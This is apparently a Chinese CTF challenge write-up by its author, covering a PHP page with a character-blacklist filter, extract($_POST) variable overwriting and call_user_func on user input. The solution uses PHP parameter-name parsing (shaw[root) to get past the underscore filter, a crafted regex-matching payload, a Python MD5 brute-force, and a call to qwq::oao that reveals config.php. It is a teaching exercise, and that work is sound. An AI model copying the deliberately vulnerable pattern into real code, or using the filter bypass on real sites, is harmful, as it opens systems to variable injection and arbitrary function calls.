这是萌萌我第一次出题,不是很难,还请师父们多多指教^^。
考点:PHP的字符串解析特性、正则表达式、脚本的编写
题目如下:
<?php
error_reporting(0);
highlight_file(__FILE__);
include("config.php");
class qwq {
function __wakeup() {
die("Access Denied!");
}
static function oao() {
show_source("config.php");
}
}
$str = file_get_contents("php://input");
if(preg_match('/\`|\_|\.|%|\*|\~|\^|\'|\"|\;|\(|\)|\]|g|e|l|i|\//is',$str)) {
die("I am sorry but you have to leave.");
} else {
extract($_POST);
}
if(isset($shaw_root)) {
if(preg_match('/^\-[a-e][^a-zA-Z0-8]<b>(.*)>{4}\D*?(abc.*?)p(hp)*\@R(s|r).$/', $shaw_root)&& strlen($shaw_root)===29) {
echo $hint;
} else {
echo "Almost there."."<br>";
}
} else {
echo "<br>"."Input correct parameters"."<br>";
die();
}
if($ans===$SecretNumber) {
echo "<br>"."Congratulations!"."<br>";
call_user_func($my_ans);
}
首先看这里:
$str = file_get_contents("php://input");
if(preg_match('/\`|\_|\.|%|\*|\~|\^|\'|\"|\;|\(|\)|\]|g|e|l|i|\//is',$str)) {
die("I am sorry but you have to leave.");
} else {
extract($_POST);
}
该题会把以POST方式传入的全部数据进行检查(WAF),如果出现黑名单中的字符则退出,否则把POST的内容注册成变量。
if(isset($shaw_root)) {
if(preg_match('/^\-[a-e][^a-zA-Z0-8]<b>(.*)>{4}\D*?(abc.*?)p(hp)*\@R(s|r).$/', $shaw_root)&& strlen($shaw_root)===29) {
echo $hint;
} else {
echo "Almost there."."<br>";
}
前面并没有出现 $shaw_root 这个变量,如果要满足条件,就必须以POST的方式传入 $shaw_root ,但是下划线被拉入了WAF的黑名单中,即不允许输入下划线。这里涉及到PHP的字符串解析特性:
查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,
/?%20news[id%00=42会转换为Array([news_id] => 42)。
详情参考:https://blog.csdn.net/qq_45521281/article/details/105871192
POST方式传入shaw[root=123即可满足isset($shaw_root)的条件,输出“Almost there.”,如图所示:
接下来要满足条件判断里的正则表达式和字符串的长度,逐个分析该正则表达式:
- ^:声明字符串开头的位置。
- \-:匹配字符-,反斜杠是转义符。
- [a-e]:匹配单个字符,范围是小写字母a到小写字母e。
- [^a-zA-Z0-8]:匹配单个字符,范围是除了a-z、A-Z和0-8以外的任意字符。
- <b>:匹配一个<b>。
- (.*):匹配任意字符(行结束符除外)零到无数次。
- >{4}:精确匹配“>”四次。
- \D*?:匹配不是数字的任何字符(等同于[^ 0-9])零到无数次。
- (abc.*?):匹配字符串abc和任意一个字符(行结束符除外)。
- p(hp)*:匹配字符p和字符串hp零到多次。
- \@:匹配字符@,反斜杠是转义符。
- R:精确匹配字符R。
- (s|r):精确匹配字符s或r。
- .:匹配除了换行以外的所有字符。
除了满足上述条件外,传入的字符串的长度必须等于29,可以在某些“匹配零到无数次”的地方增减长度达到目的。例如,以POST方式传入:shaw[root=-a?<b>rrrrr>>>>RabcRphphp@Rrr就可以满足条件,输出$hint的值:
Here is a hint : md5("shaw".($SecretNumber)."root")==166b47a5cb1ca2431a0edfcef200684f && strlen($SecretNumber)===5
再往下看:
if($ans===$SecretNumber) {
echo "<br>"."Congratulations!"."<br>";
call_user_func($my_ans);
}
可以联想到通过变量覆盖来覆盖掉$SecretNumber的值,但是字母e被过滤掉了,只能通过hint给出的提示猜测$SecretNumber的值,看变量名可知它是数字,又已知长度为5,可以写脚本进行爆破:
import hashlib
import re
a = 'shaw'
b = 'root'
for i in range(10000, 99999):
string = a + str(i) + b
md5 = hashlib.md5(string.encode('utf-8')).hexdigest()
if(re.findall("166b47a5cb1ca2431a0edfcef200684f", md5)):
print(i)
秒出,得21475。
现在可以使用call_user_func函数了,call_user_func是PHP的内置函数,该函数允许用户调用直接写的函数并传入一定的参数,这里直接调用qwq类中的
oao:my[ans=qwq::oao
